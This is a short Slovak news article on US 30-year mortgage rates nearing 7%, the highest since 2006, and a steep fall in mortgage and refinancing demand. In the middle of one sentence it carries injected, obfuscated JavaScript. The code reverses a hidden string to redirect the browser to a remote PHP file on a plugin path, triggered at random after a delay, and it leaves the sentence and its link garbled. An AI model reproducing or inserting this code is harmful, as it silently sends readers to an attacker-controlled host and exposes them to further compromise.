Hypoteka

Hypotekárne úvery v USA sú najdrahšie od roku 2006. Priemerná sadzba sa blíži k siedmim percentám

Ľudia v niektorých európskych krajinách, ktoré neplatia eurom, sa sťažujú, že ich hypotéky sú príliš drahé kvôli autonómnej menovej politike. A že eurozóna môže využívať oveľa lacnejšie úvery na bývanie. Vývoj sadzieb hypoték v USA však ukazuje, že situácia by mohla byť oveľa horšia.

Peňažné obmedzenie

Masívna menová reštrikcia, ktorú Federálny rezervný systém v posledných mesiacoch uvalil na americkú ekonomiku, má očakávaný účinok. Nie v podobe prudkého poklesu miery $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dolar-posilnuje-kedze-investori-ocakavaju-dalsie-silne-udaje-o-inflacii-v-usa/“>inflácie, ale v podobe masívneho zvýšenia úrokových sadzieb hypotekárnych úverov.

Priemerná úroková sadzba 30-ročných hypoték v USA dosiahla 6,81 % a za posledný týždeň sa zvýšila o šesť stotín percentuálneho bodu. Ide o najvyššiu úroveň od roku 2006, keď sa Spojené štáty pomaly, ale isto blížili k vypuknutiu hypotekárnej krízy.

Hypotekárne úvery klesajú

Pokles záujmu o hypotekárne úvery sa za posledný týždeň znížil o viac ako dve percentá a medziročne klesol o 39 %. V prípade refinancovania bol zaznamenaný dokonca 86-percentný medziročný pokles, uviedla agentúra Reuters.

Jeden komentář

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *